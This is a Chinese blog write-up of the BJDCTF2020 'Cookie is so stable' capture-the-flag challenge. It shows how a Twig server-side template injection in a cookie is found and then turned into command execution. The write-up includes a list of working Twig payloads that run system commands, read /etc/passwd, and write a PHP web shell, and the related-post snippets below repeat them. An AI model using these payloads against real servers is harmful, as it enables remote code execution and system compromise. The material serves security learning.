[BJDCTF2020]Cookie is so stable(PHP|Twig|SSTI)

最新推荐文章于 2024-08-04 11:54:55 发布
最新推荐文章于 2024-08-04 11:54:55 发布
阅读量799 收藏 2
点赞数 2
分类专栏: # web安全 文章标签: php web安全 网络安全 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/129936179
版权

目录

信息收集

hint页面

flag页面

命令执行 

reference

信息收集

hint页面

<!-- Why not take a closer look at cookies? -->

flag页面

输入任意内容(这里输入admin)

这里第一反应是cookie类的SQL注入?但是发现这里其实并没有实现查询信息的功能,只是将输入的内容进行打印,看下前端源码,可能是SSTI!

修改cookie

${7*7}----------{{7*7}}---------{{7*'7'}}

 确认是SSTI(PHP),根据上文的流程表判定类型是Twig

在 Twig 模板中可以直接调用函数,用于生产内容。如下调用了 range()函数用来返回一个包含整数等差数列的列表:

{% for i in range(0, 3) %}{{ i }},{% endfor %}

在twig 1.x版本,存在三个全局变量

  • _self:引用当前模板实例

  • _context:引用上下文

  • _charset:引用当前字符集

命令执行 

payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

这里可以直接修改cookie,因为直接提交会被拦截

当然flag在根目录下是猜的,我们使用命令返回的结果只有第一项

一些新版本的payload

{{'/etc/passwd'|file_excerpt(1,30)}}

{{app.request.files.get(1).__construct('/etc/passwd','')}}

{{app.request.files.get(1).openFile.fread(99)}}

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

{{_self.env.enableDebug()}}{{_self.env.isDebug()}}

{{["id"]|map("system")|join(",")

{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}

{{["id",0]|sort("system")|join(",")}}

{{["id"]|filter("system")|join(",")}}

{{[0,0]|reduce("system","id")|join(",")}}

{{['cat /etc/passwd']|filter('system')}}

reference

https://xz.aliyun.com/t/7518#toc-5

https://www.freebuf.com/articles/web/314028.html

https://www.cnblogs.com/bmjoker/p/13508538.html

[BJDCTF2020]Cookie is so stable | 信安小蚂蚁

coleak
关注
专栏目录
[BJDCTF2020]Cookie is so stable 1(twig模板注入)
weixin_45577185的博客
09-06 363
详解模板注入漏洞 关于SSTI注入的一些理解 抓个包: 发现了两个包在cookie上的不同 判断是twig,经过测试发现是ssti注入 Payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 注释:如果不抓包在页面是无法获得flag的,应该有过滤 ...
【学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 361
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
[BJDCTF2020]Cookie is so stable1
最新发布
kw741951的博客
08-04 229
尝试{{7*7}},发现ssti漏洞,判断是twig。提示看cookie,burp抓包查看cookie。抓包,发现user为注入点。点击hint查看源码。
[BJDCTF2020]Cookie is so stable
Sk1y的博客
04-05 1806
考查的地方:模板注入,利用Twig模板本身的特性进行攻击
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3575
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
PyPI 官网下载 | twig-0.1.0a4.tar.gz
01-30
标题中的“PyPI 官网下载 | twig-0.1.0a4.tar.gz”指的是在Python的包索引服务PyPI(Python Package Index)上下载的名为“twig”的软件包的一个版本,具体是0.1.0a4版本。这个版本被封装在一个tar.gz格式的压缩文件...
[BJDCTF2020]The mystery of ip(ssti模板注入题目)
m0_55109452的博客
06-02 1858
项目场景: 链接http://node3.buuoj.cn:29669/index.php 问题描述: 观察页面找到三个链接,点开flag和hint看看,发现flag那个页面窃取了客户端的ip地址,这题的题目是“The mystery of ip”IP的神秘,看来解题是要从这里入手了。 尝试解决: 既然是窃取了IP,考虑是不是XFF或Client-IP这两个header,发现这个IP确实可控,0.0,感觉可以冲了 我想到的第一个就是之前看到的sql注入的http头注入,但是也只是想想罢了,再看看其他方
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 551
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2772
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 894
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
[BJDCTF2020]Cookie is so stable(漏洞原理详解)
pakho_C的博客
04-18 3319
web第45题 [BJDCTF2020]Cookie is so stable 打开靶场 访问flag页面 一个输入框 访问hint页面,查看源码 提示与cookie有关 那么在flag页面输入后抓包观察 输入后显示 登陆后抓包显示为 做到这里又遇到新的知识点了,模板注入漏洞 参考大佬的博客:一篇文章带你理解漏洞之 SSTI 漏洞,讲的非常详细 漏洞原理: SSTI 怎么产生的 服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过
2020/7/19 - [BJDCTF2020]Cookie is so stable - twg服务器端模板注入
抒情诗
07-20 383
这是道服务器端模板注入,过段时间总结一下各种payload到一篇文章里。 测试ssti漏洞的payload为 {{7*'7'}} 如果返回的是49就是twg注入,7777777是jinja2(这个我还没实验,摘自他人文章) 返回的是49,说明是twg模板,下面是固定的测试twg注入的payload, 一篇文章带你理解漏洞之 SSTI 漏洞 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
掌握轻量级PHP模板Twig:从入门到深入
Twig参考文档是一份全面指南,介绍了PHP模板引擎Twig的核心功能和使用技巧。该文档旨在帮助开发者,特别是模板设计师和开发者,充分利用Twig的轻量级特性来提升开发效率。以下是文档大纲的关键知识点: 1. **简介**...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值